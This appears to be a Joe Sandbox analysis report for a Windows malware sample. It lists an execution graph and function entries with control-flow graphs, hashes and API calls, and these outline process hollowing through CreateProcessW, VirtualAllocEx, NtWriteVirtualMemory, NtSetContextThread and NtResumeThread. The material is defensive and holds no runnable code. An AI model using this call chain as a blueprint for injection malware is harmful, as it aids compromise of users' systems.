                                                execution_graph 1529 380848 1530 38086a 1529->1530 1535 3834af 1530->1535 1531 380fc8 1547 38722e 1531->1547 1536 3834c9 1535->1536 1558 385318 1536->1558 1538 3837c4 1572 385469 1538->1572 1576 385470 1538->1576 1539 383cb6 1580 3850f8 1539->1580 1548 387263 1547->1548 1554 385318 NtWriteVirtualMemory 1548->1554 1549 3874dd 1592 387ec0 1549->1592 1550 38752b 1555 385469 NtSetContextThread 1550->1555 1556 385470 NtSetContextThread 1550->1556 1551 387a1a 1553 3850f8 NtResumeThread 1551->1553 1552 381051 1553->1552 1554->1549 1555->1551 1556->1551 1559 385361 NtWriteVirtualMemory 1558->1559 1561 383776 1559->1561 1562 3846f0 1561->1562 1567 3846e2 1561->1567 1563 38471a 1562->1563 1584 384fc8 1563->1584 1588 384fc1 1563->1588 1564 384bc0 1564->1538 1568 38471a 1567->1568 1570 384fc8 NtReadVirtualMemory 1568->1570 1571 384fc1 NtReadVirtualMemory 1568->1571 1569 384bc0 1569->1538 1570->1569 1571->1569 1573 3854b9 NtSetContextThread 1572->1573 1575 385531 1573->1575 1575->1539 1577 3854b9 NtSetContextThread 1576->1577 1579 385531 1577->1579 1579->1539 1581 38513c NtResumeThread 1580->1581 1583 3840a1 1581->1583 1583->1531 1585 385014 NtReadVirtualMemory 1584->1585 1587 38508c 1585->1587 1587->1564 1589 384fc8 NtReadVirtualMemory 1588->1589 1591 38508c 1589->1591 1591->1564 1593 387eea 1592->1593 1595 384fc8 NtReadVirtualMemory 1593->1595 1596 384fc1 NtReadVirtualMemory 1593->1596 1594 388342 1594->1550 1595->1594 1596->1594 1597 3851f8 1598 38523c VirtualAllocEx 1597->1598 1600 3852b4 1598->1600 1605 38083a 1606 380848 1605->1606 1609 3834af 6 API calls 1606->1609 1607 380fc8 1610 38722e 6 API calls 1607->1610 1608 381051 1609->1607 1610->1608 1601 384110 1604 3841a0 CreateProcessW 1601->1604 1603 384574 1604->1603 1611 384104 1613 384110 CreateProcessW 1611->1613 1614 384574 1613->1614

                                                Executed Functions

                                                Function 00381258 Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 381258-381272 1 381279-3812ab 0->1 2 381274 0->2 4 3812b1-3812dc 1->4 5 381573-381587 1->5 2->1 8 3812de 4->8 9 3812e3-381304 4->9 8->9 10 38130b-38132f 9->10 11 381306 9->11 12 381331 10->12 13 381336-381350 10->13 11->10 12->13 14 381352 13->14 15 381357-381378 13->15 14->15 16 38137a 15->16 17 38137f-381399 15->17 16->17 18 38139b 17->18 19 3813a0-3813b7 17->19 18->19 20 3813b9 19->20 21 3813be-3813e1 19->21 20->21 22 3813e8-381402 21->22 23 3813e3 21->23 24 381409-38142a 22->24 25 381404 22->25 23->22 26 38142c 24->26 27 381431-38144b 24->27 25->24 26->27 28 38144d 27->28 29 381452-381469 27->29 28->29 30 38146b 29->30 31 381470-381487 29->31 30->31 32 381489 31->32 33 38148e-3814af 31->33 32->33 34 3814b1 33->34 35 3814b6-3814d0 33->35 34->35 36 3814d2 35->36 37 3814d7-381500 35->37 36->37 38 381502 37->38 39 381507-381556 call 380140 37->39 38->39 46 38155e-381572 39->46 46->5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8!p$\X2
                                                • API String ID: 0-4130623958
                                                • Opcode ID: a30485a2f863b9951010c7e6e605a2460ba9fec735ad3a5c99ef9c9e89ceec4b
                                                • Instruction ID: 6cb0dc191a18f45d86a45e924ab37ba932c85206a374e88b8af53c90affdcd03
                                                • Opcode Fuzzy Hash: a30485a2f863b9951010c7e6e605a2460ba9fec735ad3a5c99ef9c9e89ceec4b
                                                • Instruction Fuzzy Hash: 70A13270A00258CFEB40DFA9C544A9EFBB2FF88301F19C5A5D409AB266D738D942CB95
                                                Function 0038722E Relevance: 2.0, Strings: 1, Instructions: 709COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,
                                                • API String ID: 0-3772416878
                                                • Opcode ID: acadad6190200dbf454d62e84b72e7ac1115997e12a87c433b35ef6c86c72465
                                                • Instruction ID: ea5b28cbed3e8aa69b7ee8050a489cce67dd87804c91ae3559af6c834e9a8baa
                                                • Opcode Fuzzy Hash: acadad6190200dbf454d62e84b72e7ac1115997e12a87c433b35ef6c86c72465
                                                • Instruction Fuzzy Hash: B872F370A012658BE761DF28C848B9AF7B2EF49301F25C5E5D40DAB262D738DE81CF95
                                                Function 003834AF Relevance: 2.0, Strings: 1, Instructions: 700COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,
                                                • API String ID: 0-3772416878
                                                • Opcode ID: 6b1cbef713128be45360ad419b825bb3006f153f36883445be84c0e89b434379
                                                • Instruction ID: 853bb0c221d35b534ac2890dedc604a111d525855802b92db4ec7618368db83c
                                                • Opcode Fuzzy Hash: 6b1cbef713128be45360ad419b825bb3006f153f36883445be84c0e89b434379
                                                • Instruction Fuzzy Hash: E2720470A002658BE761EF68C948B9AF7B2EF48301F1585E5D40DAB362D738DE81CF95
                                                Function 00384110 Relevance: 1.9, APIs: 1, Instructions: 397processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 365 384110-3841ca 367 3841d0-38420b 365->367 368 384282-384297 365->368 384 38420d-384215 367->384 385 384243-384254 367->385 369 38429d-3842e3 368->369 370 384347-38434b 368->370 389 384321-38432c 369->389 390 3842e5-3842ed 369->390 371 38434d-38438f 370->371 372 384395-3843e6 370->372 371->372 374 3843ec-384427 372->374 375 38449e-3844b0 372->375 407 384429-384431 374->407 408 38445f-384470 374->408 377 3844cd-3844df 375->377 378 3844b2-3844ca 375->378 382 3844fc-384572 CreateProcessW 377->382 383 3844e1-3844f9 377->383 378->377 391 38457b-3845bc 382->391 392 384574-38457a 382->392 383->382 387 384238-384241 384->387 388 384217-384221 384->388 398 38425a-38427a 385->398 387->398 394 384223 388->394 395 384225-384234 388->395 405 384332-384341 389->405 396 3842ef-3842f9 390->396 397 384310-38431f 390->397 414 3845be-3845cd 391->414 415 3845d3-3845ea 391->415 392->391 394->395 395->395 404 384236 395->404 402 3842fb 396->402 403 3842fd-38430c 396->403 397->405 398->368 402->403 403->403 411 38430e 403->411 404->387 405->370 412 384433-38443d 407->412 413 384454-38445d 407->413 419 384476-384496 408->419 411->397 417 38443f 412->417 418 384441-384450 412->418 413->419 414->415 423 3845ec-3845f8 415->423 424 384603-384613 415->424 417->418 418->418 422 384452 418->422 419->375 422->413 423->424 425 38462a-38466d 424->425 426 384615-384624 424->426 431 38467d-384681 425->431 432 38466f-384673 425->432 426->425 434 384691-384695 431->434 435 384683-384687 431->435 432->431 433 384675-384678 call 3803f8 432->433 433->431 438 3846a5 434->438 439 384697-38469b 434->439 435->434 437 384689-38468c call 3803f8 435->437 437->434 443 3846a6 438->443 439->438 441 38469d-3846a0 call 3803f8 439->441 441->438 443->443
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 0038455F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: b30fc632da41e6957d4b43a76fb720e8761cbebaa66e64a36c23a0c172c12d81
                                                • Instruction ID: e89d64a8e1002c6f9a12c4d48c2187345703393e5ab5238314e0ff958975c102
                                                • Opcode Fuzzy Hash: b30fc632da41e6957d4b43a76fb720e8761cbebaa66e64a36c23a0c172c12d81
                                                • Instruction Fuzzy Hash: F402E374D00329CFEB65DFA9C881B9DBBB1BF49304F1081AAE419B7250DB74AA85CF54
                                                Function 00384104 Relevance: 1.9, APIs: 1, Instructions: 390processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 444 384104-3841ca 447 3841d0-38420b 444->447 448 384282-384297 444->448 464 38420d-384215 447->464 465 384243-384254 447->465 449 38429d-3842e3 448->449 450 384347-38434b 448->450 469 384321-38432c 449->469 470 3842e5-3842ed 449->470 451 38434d-38438f 450->451 452 384395-3843e6 450->452 451->452 454 3843ec-384427 452->454 455 38449e-3844b0 452->455 487 384429-384431 454->487 488 38445f-384470 454->488 457 3844cd-3844df 455->457 458 3844b2-3844ca 455->458 462 3844fc-384572 CreateProcessW 457->462 463 3844e1-3844f9 457->463 458->457 471 38457b-3845bc 462->471 472 384574-38457a 462->472 463->462 467 384238-384241 464->467 468 384217-384221 464->468 478 38425a-38427a 465->478 467->478 474 384223 468->474 475 384225-384234 468->475 485 384332-384341 469->485 476 3842ef-3842f9 470->476 477 384310-38431f 470->477 494 3845be-3845cd 471->494 495 3845d3-3845ea 471->495 472->471 474->475 475->475 484 384236 475->484 482 3842fb 476->482 483 3842fd-38430c 476->483 477->485 478->448 482->483 483->483 491 38430e 483->491 484->467 485->450 492 384433-38443d 487->492 493 384454-38445d 487->493 499 384476-384496 488->499 491->477 497 38443f 492->497 498 384441-384450 492->498 493->499 494->495 503 3845ec-3845f8 495->503 504 384603-384613 495->504 497->498 498->498 502 384452 498->502 499->455 502->493 503->504 505 38462a-38466d 504->505 506 384615-384624 504->506 511 38467d-384681 505->511 512 38466f-384673 505->512 506->505 514 384691-384695 511->514 515 384683-384687 511->515 512->511 513 384675-384678 call 3803f8 512->513 513->511 518 3846a5 514->518 519 384697-38469b 514->519 515->514 517 384689-38468c call 3803f8 515->517 517->514 523 3846a6 518->523 519->518 521 38469d-3846a0 call 3803f8 519->521 521->518 523->523
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 0038455F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: bc01288fbedd2e1e2d778dda79bad587b55e34205583fb12834ac5f90a729ffe
                                                • Instruction ID: 515287959645b1a98c475e1dc3d1a33885f9176fc5f412ca85a46341e3ca994d
                                                • Opcode Fuzzy Hash: bc01288fbedd2e1e2d778dda79bad587b55e34205583fb12834ac5f90a729ffe
                                                • Instruction Fuzzy Hash: F4F1E274D00329CFEB25DFA9C881B9DBBB1BF49304F1081AAE819B7250DB749A85CF54
                                                Function 00385318 Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 524 385318-385380 526 385382-385394 524->526 527 385397-3853f8 NtWriteVirtualMemory 524->527 526->527 529 3853fa-385400 527->529 530 385401-385453 527->530 529->530
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 003853E8
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 7fe4e35ad66cb4104b68ffa62a2f94d07e4979b881ce18b5b14c6d5611285918
                                                • Instruction ID: 299e02c7345cda3148e5ecbb9635ad675bf9aa5d71d0d66ee98a1730e4ac5a7f
                                                • Opcode Fuzzy Hash: 7fe4e35ad66cb4104b68ffa62a2f94d07e4979b881ce18b5b14c6d5611285918
                                                • Instruction Fuzzy Hash: 6141A8B5D012589FCF00CFA9D984AEEFBF1BB49310F24942AE815B7250D379AA45CB64
                                                Function 00384FC1 Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 535 384fc1-38508a NtReadVirtualMemory 539 38508c-385092 535->539 540 385093-3850e5 535->540 539->540
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0038507A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: 438ee6253f41abbe109728cbfdeae13ab8c9557f715b834f7cb45eaaba2f727d
                                                • Instruction ID: 059bcead2d9dc787918833e984e80b1f5cff2971f79322d5bf5cbfd2274da89f
                                                • Opcode Fuzzy Hash: 438ee6253f41abbe109728cbfdeae13ab8c9557f715b834f7cb45eaaba2f727d
                                                • Instruction Fuzzy Hash: 4A41B9B5D002589FCF00CFA9D884AEEFBB1BF4A310F24946AE814B7210C735A945CF64
                                                Function 00384FC8 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 545 384fc8-38508a NtReadVirtualMemory 548 38508c-385092 545->548 549 385093-3850e5 545->549 548->549
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0038507A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: 5b64737c1d6e3bc609d4696642c1841762237a012c7e5a75f2cec2d3273a7abf
                                                • Instruction ID: c9eaa378ac3a50763dc397eec806bfc0f230d9db0cec446eab66ac0ba8424c57
                                                • Opcode Fuzzy Hash: 5b64737c1d6e3bc609d4696642c1841762237a012c7e5a75f2cec2d3273a7abf
                                                • Instruction Fuzzy Hash: FD41A9B5D00258DFCF00CFAAD984AEEFBB1BB49310F20942AE814B7210D735A945CF64
                                                Function 00385469 Relevance: 1.6, APIs: 1, Instructions: 95nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 563 385469-3854d0 565 3854d2-3854e4 563->565 566 3854e7-38552f NtSetContextThread 563->566 565->566 568 385538-385584 566->568 569 385531-385537 566->569 569->568
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 0038551F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 58f59fc7a5fc6e4f15012db9699963ff371c119b596cda5a7fc4773591fea0f3
                                                • Instruction ID: 00c7fd532561f084eaca8eb43db22b5d20ffd6ffda03a79e32738d7189eb1143
                                                • Opcode Fuzzy Hash: 58f59fc7a5fc6e4f15012db9699963ff371c119b596cda5a7fc4773591fea0f3
                                                • Instruction Fuzzy Hash: CC41ECB4D012589FCB10CFA9D884AEEFBF1BF49310F24806AE405B7250C338A989CF54
                                                Function 00385470 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 574 385470-3854d0 576 3854d2-3854e4 574->576 577 3854e7-38552f NtSetContextThread 574->577 576->577 579 385538-385584 577->579 580 385531-385537 577->580 580->579
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 0038551F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 1c14208377f593a2c982ade616b9eeadb20aca800801c75c0b4e0728442d7a9b
                                                • Instruction ID: c943215835f20849c822f344a4dc2f66902fc5acfa7fe7f0cd914b70cb493f14
                                                • Opcode Fuzzy Hash: 1c14208377f593a2c982ade616b9eeadb20aca800801c75c0b4e0728442d7a9b
                                                • Instruction Fuzzy Hash: 9331DDB4D012589FCB10DFAAD884AEEFBF1BF49310F24802AE415B7210D738A989CF54
                                                Function 003850F8 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 585 3850f8-385191 NtResumeThread 588 38519a-3851de 585->588 589 385193-385199 585->589 589->588
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 00385181
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 7f2d90318563f0046ef23600da58b1665cf3c8531fa1edbd95807396279fadb2
                                                • Instruction ID: 2b2e4fce35c510df32952cd11d2221f338325d4018e705941eae51146ab1bed5
                                                • Opcode Fuzzy Hash: 7f2d90318563f0046ef23600da58b1665cf3c8531fa1edbd95807396279fadb2
                                                • Instruction Fuzzy Hash: 2531A7B5D012189FCF10CFA9D985ADEFBB5BB49310F20942AE815B7310C775A945CFA4
                                                Function 0038083A Relevance: .5, Instructions: 534COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 594 38083a-380868 596 38086a 594->596 597 38086f-38087f call 381071 594->597 596->597 598 380885-3808b8 597->598 600 3808ba 598->600 601 3808bf-3808d9 598->601 600->601 602 3808db 601->602 603 3808e0-3808f7 601->603 602->603 604 3808f9 603->604 605 3808fe-38091f 603->605 604->605 606 380921 605->606 607 380926-380940 605->607 606->607 608 380942 607->608 609 380947-380968 607->609 608->609 610 38096a 609->610 611 38096f-380993 609->611 610->611 612 38099a-3809be 611->612 613 380995 611->613 614 3809c0 612->614 615 3809c5-3809df 612->615 613->612 614->615 616 3809e1 615->616 617 3809e6-3809fd 615->617 616->617 618 3809ff 617->618 619 380a04-380a25 617->619 618->619 620 380a2c-380a50 619->620 621 380a27 619->621 622 380a52 620->622 623 380a57-380a71 620->623 621->620 622->623 624 380a78-380a99 623->624 625 380a73 623->625 626 380a9b 624->626 627 380aa0-380acc 624->627 625->624 626->627 628 380ace 627->628 629 380ad3-380af7 627->629 628->629 630 380af9 629->630 631 380afe-380b22 629->631 630->631 632 380b29-380b4d 631->632 633 380b24 631->633 634 380b4f 632->634 635 380b54-380b6e 632->635 633->632 634->635 636 380b70 635->636 637 380b75-380b8c 635->637 636->637 638 380b8e 637->638 639 380b93-380baa 637->639 638->639 640 380bac 639->640 641 380bb1-380bc8 639->641 640->641 642 380bca 641->642 643 380bcf-380bf8 641->643 642->643 644 380bfa 643->644 645 380bff-380c23 643->645 644->645 646 380c2a-380c44 645->646 647 380c25 645->647 648 380c4b-380c6c 646->648 649 380c46 646->649 647->646 650 380c6e 648->650 651 380c73-380c8d 648->651 649->648 650->651 652 380c8f 651->652 653 380c94-380cab 651->653 652->653 654 380cad 653->654 655 380cb2-380cd3 653->655 654->655 656 380cda-380cf4 655->656 657 380cd5 655->657 658 380cfb-380d15 656->658 659 380cf6 656->659 657->656 660 380d1c-380d36 658->660 661 380d17 658->661 659->658 662 380d38 660->662 663 380d3d-380d54 660->663 661->660 662->663 664 380d5b-380d72 663->664 665 380d56 663->665 666 380d79-380d9a 664->666 667 380d74 664->667 665->664 668 380d9c 666->668 669 380da1-380dbb 666->669 667->666 668->669 670 380dbd 669->670 671 380dc2-380dd9 669->671 670->671 672 380ddb 671->672 673 380de0-380e01 671->673 672->673 674 380e08-380e22 673->674 675 380e03 673->675 676 380e29-380e40 674->676 677 380e24 674->677 675->674 678 380e42 676->678 679 380e47-380e68 676->679 677->676 678->679 680 380e6a 679->680 681 380e6f-380e93 679->681 680->681 682 380e9a-380eb4 681->682 683 380e95 681->683 684 380ebb-380edc 682->684 685 380eb6 682->685 683->682 686 380ede 684->686 687 380ee3-380eef call 380140 684->687 685->684 686->687 689 380ef4-380f03 call 381589 687->689 690 380f09-380f15 689->690 691 380f20-380f26 call 38180f 690->691 692 380f2c-380f76 691->692 696 380f82-380f90 call 380520 692->696 698 380f95-380fa3 call 380530 696->698 700 380fa8-380fc2 call 3834af 698->700 701 380fc8-380fff 700->701 704 38100b-381019 call 380520 701->704 706 38101e-38102c call 380530 704->706 708 381031-38104b call 38722e 706->708 709 381051-38105b 708->709
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d20db6cdfe4d361ffb4b033c3cf944c1e42175fcddd4b848944b56a11baa0b42
                                                • Instruction ID: 27c70bd1d0e57dca5488d883390d966447878834d34b13f8b1221cfc0dc56a66
                                                • Opcode Fuzzy Hash: d20db6cdfe4d361ffb4b033c3cf944c1e42175fcddd4b848944b56a11baa0b42
                                                • Instruction Fuzzy Hash: 62322830A002948FE7A4DFB8D440B4EFBB2EF49301F25C5A9D449EB662D738D985CB95
                                                Function 00380848 Relevance: .5, Instructions: 526COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 715 380848-380868 716 38086a 715->716 717 38086f-3808b8 call 381071 715->717 716->717 720 3808ba 717->720 721 3808bf-3808d9 717->721 720->721 722 3808db 721->722 723 3808e0-3808f7 721->723 722->723 724 3808f9 723->724 725 3808fe-38091f 723->725 724->725 726 380921 725->726 727 380926-380940 725->727 726->727 728 380942 727->728 729 380947-380968 727->729 728->729 730 38096a 729->730 731 38096f-380993 729->731 730->731 732 38099a-3809be 731->732 733 380995 731->733 734 3809c0 732->734 735 3809c5-3809df 732->735 733->732 734->735 736 3809e1 735->736 737 3809e6-3809fd 735->737 736->737 738 3809ff 737->738 739 380a04-380a25 737->739 738->739 740 380a2c-380a50 739->740 741 380a27 739->741 742 380a52 740->742 743 380a57-380a71 740->743 741->740 742->743 744 380a78-380a99 743->744 745 380a73 743->745 746 380a9b 744->746 747 380aa0-380acc 744->747 745->744 746->747 748 380ace 747->748 749 380ad3-380af7 747->749 748->749 750 380af9 749->750 751 380afe-380b22 749->751 750->751 752 380b29-380b4d 751->752 753 380b24 751->753 754 380b4f 752->754 755 380b54-380b6e 752->755 753->752 754->755 756 380b70 755->756 757 380b75-380b8c 755->757 756->757 758 380b8e 757->758 759 380b93-380baa 757->759 758->759 760 380bac 759->760 761 380bb1-380bc8 759->761 760->761 762 380bca 761->762 763 380bcf-380bf8 761->763 762->763 764 380bfa 763->764 765 380bff-380c23 763->765 764->765 766 380c2a-380c44 765->766 767 380c25 765->767 768 380c4b-380c6c 766->768 769 380c46 766->769 767->766 770 380c6e 768->770 771 380c73-380c8d 768->771 769->768 770->771 772 380c8f 771->772 773 380c94-380cab 771->773 772->773 774 380cad 773->774 775 380cb2-380cd3 773->775 774->775 776 380cda-380cf4 775->776 777 380cd5 775->777 778 380cfb-380d15 776->778 779 380cf6 776->779 777->776 780 380d1c-380d36 778->780 781 380d17 778->781 779->778 782 380d38 780->782 783 380d3d-380d54 780->783 781->780 782->783 784 380d5b-380d72 783->784 785 380d56 783->785 786 380d79-380d9a 784->786 787 380d74 784->787 785->784 788 380d9c 786->788 789 380da1-380dbb 786->789 787->786 788->789 790 380dbd 789->790 791 380dc2-380dd9 789->791 790->791 792 380ddb 791->792 793 380de0-380e01 791->793 792->793 794 380e08-380e22 793->794 795 380e03 793->795 796 380e29-380e40 794->796 797 380e24 794->797 795->794 798 380e42 796->798 799 380e47-380e68 796->799 797->796 798->799 800 380e6a 799->800 801 380e6f-380e93 799->801 800->801 802 380e9a-380eb4 801->802 803 380e95 801->803 804 380ebb-380edc 802->804 805 380eb6 802->805 803->802 806 380ede 804->806 807 380ee3-38104b call 380140 call 381589 call 38180f call 380520 call 380530 call 3834af call 380520 call 380530 call 38722e 804->807 805->804 806->807 829 381051-38105b 807->829
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 142b01739950f101a2344ded45a700656a60d2509dcf44fe001643e9775d1ce8
                                                • Instruction ID: 0190e10fe3a5b45829e1293822280e3fc5e358a716cda985b9a7b9a128b3ee1c
                                                • Opcode Fuzzy Hash: 142b01739950f101a2344ded45a700656a60d2509dcf44fe001643e9775d1ce8
                                                • Instruction Fuzzy Hash: C5321730A002548FE7A4DFB8D440B4EFBB2EF49301F25C5A9D449EB662D738D985CB95
                                                Function 003846E2 Relevance: .3, Instructions: 347COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 835 3846e2-384718 836 38471a 835->836 837 38471f-38476a 835->837 836->837 839 38476c 837->839 840 384771-384795 837->840 839->840 841 38479c-3847c0 840->841 842 384797 840->842 843 3847c2 841->843 844 3847c7-3847eb 841->844 842->841 843->844 845 3847ed 844->845 846 3847f2-38480c 844->846 845->846 847 38480e 846->847 848 384813-384863 call 380140 846->848 847->848 852 38486a-384884 848->852 853 384865 848->853 854 38488b-3848a2 852->854 855 384886 852->855 853->852 856 3848a9-3848c0 854->856 857 3848a4 854->857 855->854 858 3848c2 856->858 859 3848c7-3848e8 856->859 857->856 858->859 860 3848ea 859->860 861 3848ef-384909 859->861 860->861 862 38490b 861->862 863 384910-384927 861->863 862->863 864 384929 863->864 865 38492e-38494f 863->865 864->865 866 384951 865->866 867 384956-384970 865->867 866->867 868 384972 867->868 869 384977-384998 867->869 868->869 870 38499a 869->870 871 38499f-3849c3 869->871 870->871 872 3849ca-3849e4 871->872 873 3849c5 871->873 874 3849eb-384a02 872->874 875 3849e6 872->875 873->872 876 384a09-384a2a 874->876 877 384a04 874->877 875->874 878 384a2c 876->878 879 384a31-384a4b 876->879 877->876 878->879 880 384a4d 879->880 881 384a52-384a73 879->881 880->881 882 384a7a-384a9e 881->882 883 384a75 881->883 884 384aa0 882->884 885 384aa5-384abf 882->885 883->882 884->885 886 384ac1 885->886 887 384ac6-384ae7 885->887 886->887 888 384ae9 887->888 889 384aee-384b68 call 380140 call 384c02 call 38075c 887->889 888->889 897 384b6a-384b6e 889->897 898 384b77-384b7b 889->898 899 384b70 897->899 900 384b75 897->900 901 384b7d 898->901 902 384b82-384bbb 898->902 899->900 900->902 901->902 909 384bbe call 384fc8 902->909 910 384bbe call 384fc1 902->910 904 384bc0-384bf2 909->904 910->904
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.518239327.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_380000_NXRWIG.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b06bf87dc05069f61d2e0e0b62490a5de791f210f2018b8437691ecc6267f796
                                                • Instruction ID: 848918facfe4b4b0839dca8c4bb15affa40fcfa4d1365bbabb28c5f5014cf10f
                                                • Opcode Fuzzy Hash: b06bf87dc05069f61d2e0e0b62490a5de791f210f2018b8437691ecc6267f796
                                                • Instruction Fuzzy Hash: 72F12630A002958FEB51DFA8C440B9EFBB2EF49300F25C5AAD409EB756D738D981CB95
                                                Function 003846F0 Relevance: .3, Instructions: 345COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
